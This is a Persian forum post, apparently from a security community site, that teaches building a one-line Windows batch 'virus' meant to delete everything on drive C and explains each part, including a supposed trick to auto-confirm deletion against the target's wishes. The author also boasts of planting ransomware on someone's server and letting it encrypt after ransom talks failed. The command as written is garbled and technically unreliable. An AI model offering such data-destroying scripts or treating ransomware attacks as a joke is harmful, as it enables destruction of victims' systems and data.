discord icon
سرور دیسکورد گاردایران
SRX

حذف کامل ویندوز!

پست های پیشنهاد شده

سلام دوستان!

من تا به حال چند نوع ویروس قرار دادم که خطر چندانی برای ویندوز نداشت، اما ویروسی کوتاه و مخربی که الان می خواهم آموزش ساختش رو بزارم، خیلی خطرناکه و به هیچ عنوان نباید در ویندوز اجا بشه.

با اجرای این ویروس شما رسما ویندوز را از بین می برید پس حواستون باشه.

ویروس فقط یک خط کد هست که باید آن را درون یک تکست ادیتور منتقل کنید و با فرمت .bat ذخیره کنید، هر بخش وظیفه خاصی دارد که توضیح خواهم داد.

@echo off del C: *.* ly

@echo off برای این هست که Command Prompt کار خودش را بکند و کاری به کاربر نداشته باشد.

del C : هم دستور حدف درایو C هستش که ویندوز روی اون نصبه.

*.* این دستور، به صورت کلی درایوی که انتخاب شده رو پاک می کنه. (یعنی هر نوع فایل با هر نوع فرمتی مثل .png , .mp4 , .exe و ... را حذف می کند)

ly وقتی فایل اجرا شود از کاربر می پرسد که می خواهید پروسه حذف درایو C انجام بشه؟.خب قطعا تارگت می زنه روی No.

در اینجا ly به کمک شما میاد و به صورت دیفالت خودش گزینه yes رو انتخاب می کنه.

هر فایلی که می بینید اجرا نکنید.

حالا با یه خاطره طنز می خوام بگم که عجب آدم هایی پیدا میشن.

یه بار روی یه سرور یه باج افزار گذاشتم، خیلی از نیمه شب گذشته بود، حوصله نداشتم ادامه بدم رفتم خوابیدم.

روز بعدش اومدم باج رو فعال کنم دیدم، طرف خودش اومده باج رو ران کرده (جالب اینجاست که باج باید با دسترسی ادمین اجرا میشد) یعنی خودش اومده با دسترسی ادمین باج رو ران کرده و خودش رو بدبخت کرده. به توافق هم نرسیدیم و باج کار خودش رو کرد.

اگر فایل مشکوکی در سیستم یا سرور شخصی خودتون می بینید، اول آن را به virustotal.com بدهید و اگر مشکل نداشت باز کنید. (کمتر ویروسی پیدا میشه که ویروس توتال نتونه شناساییش کنه)

موفق باشید🌹🌺

به اشتراک گذاری این ارسال

لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری